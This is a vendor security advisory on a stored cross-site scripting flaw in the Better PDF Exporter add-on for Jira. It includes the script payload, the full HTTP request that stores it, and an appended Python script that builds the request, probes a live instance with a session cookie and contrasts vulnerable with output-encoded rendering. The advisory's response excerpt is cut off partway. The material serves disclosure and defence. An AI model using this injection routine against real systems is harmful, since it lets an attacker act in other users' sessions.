-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2022-038
Product: Better PDF Exporter for Jira
Manufacturer: Midori Global Consulting Kft.
Affected Version(s): 10.0.0
Tested Version(s): 9.6.0
Vulnerability Type: Stored Cross-Site Scripting (CWE-79)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2022-05-27
Solution Date: -
Public Disclosure: 2022-07-22
CVE Reference: CVE-2022-36131
Author of Advisory: Lukas Faiß, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Better PDF Exporter is an add-on for Jira that exports Jira artifacts
to PDF files.

The manufacturer describes the product as follows (see [1]):

"Better PDF Exporter exports Jira issues to PDF documents to share,
print, email, archive and report issues in the standard business
document file format."

Due to insufficient input validation of user-provided input (the
description of a PDF template is stored and later rendered without
output encoding), Better PDF Exporter is vulnerable to stored
cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The 'PDF Templates' overview is prone to a stored cross-site scripting
attack. An attacker who can save a PDF template stores malicious
JavaScript code on the server; the code is embedded in server replies
and later executed in the web browsers of other users who open the
overview. By executing JavaScript, attackers can, for example, perform
actions in the context of other logged-in users.

For testing purposes, the add-on of the manufacturer [1] was used in a
local Jira Server [4] installation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The 'PDF Template' edit view in the administration back end can be
used for the attack, so the attacker needs a Jira account that is
allowed to edit PDF templates. After entering the attack vector

<script>alert('SySS_PXSS_PoC');</script>

in the description field of a PDF template, the following request is
sent to the server:

POST /rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/30 HTTP/2
Host: [REDACTED]
Cookie: [REDACTED]
Content-Length: 153
Sec-Ch-Ua: "Not A;Brand";v="99", "Google Chrome";v="101"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: [REDACTED]
Sec-Ch-Ua-Platform: "Linux"
Origin: [REDACTED]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [REDACTED]/secure/update-pdf-resource.jspa?id=30
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

name=Pentest.pdf&description=%3cscript%3ealert('SySS_PXSS_PoC')%3b%3c%2fscript%3e&content=content

By opening the 'PDF Templates' overview page via the URL
"https://[REDACTED]/secure/pdf-resources.jspa", the stored payload is
loaded and executed. The payload is contained unencoded in the
following response:

...
Pentest.pdf
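The following Python script is an added example and is not part of the SySS advisory or of Midori's plugin code. It reproduces the PoC request body from the advisory, contrasts a toy rendering of the overview row that emits the description verbatim (the vulnerable behaviour) with one that HTML-encodes it on output (the fix), and provides a check for whether a stored payload comes back unencoded. The table markup, the `probe()` helper, its `base_url`/`session_cookie` parameters and the assumption of an authenticated admin session cookie are assumptions for illustration; only the endpoint paths, the parameter names and the payload are taken from the advisory.

```python
"""Stored XSS in Better PDF Exporter (SYSS-2022-038): reproduce and check.

Added example; not the advisory's or the vendor's code.
"""
import html
import urllib.parse
import urllib.request

# URL-decoded form of the 'description' parameter from the advisory's PoC request.
PAYLOAD = "<script>alert('SySS_PXSS_PoC');</script>"

# Endpoint paths from the advisory; resource id 30 is the one used in the PoC.
UPDATE_PATH = "/rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/{id}"
OVERVIEW_PATH = "/secure/pdf-resources.jspa"


def build_update_body(name, description, content="content"):
    """Form-encode the three parameters the PoC request sends.

    urlencode() percent-encodes a few more characters than the captured
    request did (quotes, parentheses); both forms decode identically.
    """
    return urllib.parse.urlencode(
        {"name": name, "description": description, "content": content}
    )


def render_template_row(name, description, escape):
    """Toy rendering of one row of the 'PDF Templates' overview (markup assumed).

    escape=False mirrors the vulnerable behaviour: the user-controlled
    description is written into the HTML verbatim.
    escape=True is the fix: HTML-encode the field on output, so the
    stored '<script>' text can no longer be parsed as a tag.
    """
    desc = html.escape(description, quote=True) if escape else description
    return f"<tr><td>{html.escape(name)}</td><td>{desc}</td></tr>"


def is_reflected_unencoded(page_html, payload=PAYLOAD):
    """True if the payload appears in the page exactly as submitted."""
    return payload in page_html


def probe(base_url, session_cookie, resource_id=30):
    """Submit the PoC to a test instance and check the overview (network; not run here).

    Assumes an authenticated Jira session cookie of a user who may edit
    PDF templates, e.g. 'JSESSIONID=...'. Use only against your own instance.
    """
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    body = build_update_body("Pentest.pdf", PAYLOAD).encode()
    update = urllib.request.Request(
        base_url + UPDATE_PATH.format(id=resource_id),
        data=body, method="POST", headers=headers,
    )
    urllib.request.urlopen(update).read()
    overview = urllib.request.Request(
        base_url + OVERVIEW_PATH, headers={"Cookie": session_cookie}
    )
    page = urllib.request.urlopen(overview).read().decode("utf-8", "replace")
    return is_reflected_unencoded(page)


if __name__ == "__main__":
    print(build_update_body("Pentest.pdf", PAYLOAD))
    vulnerable = render_template_row("Pentest.pdf", PAYLOAD, escape=False)
    fixed = render_template_row("Pentest.pdf", PAYLOAD, escape=True)
    print("vulnerable row reflects payload:", is_reflected_unencoded(vulnerable))
    print("fixed row reflects payload:     ", is_reflected_unencoded(fixed))
```

The check in `is_reflected_unencoded()` is deliberately strict: it only reports the verbatim payload, so a response in which the angle brackets come back as `&lt;` and `&gt;` is treated as fixed. When testing a patched build, also confirm that the encoded description still renders readably in the overview, since the fix belongs at the output side, not in rejecting `<` on input.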